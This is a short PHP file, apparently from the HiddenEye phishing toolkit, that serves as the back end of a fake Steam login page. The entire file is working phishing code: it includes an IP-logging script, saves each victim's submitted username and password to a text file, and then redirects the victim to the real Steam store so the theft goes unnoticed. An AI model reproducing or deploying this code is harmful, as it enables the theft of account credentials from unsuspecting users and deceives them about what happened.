HiddenEye-Legacy/WebPages/steam/login.php
2018-06-16 21:51:03 +08:00

7 lines
214 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "[USERNAME]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://store.steampowered.com/');
exit();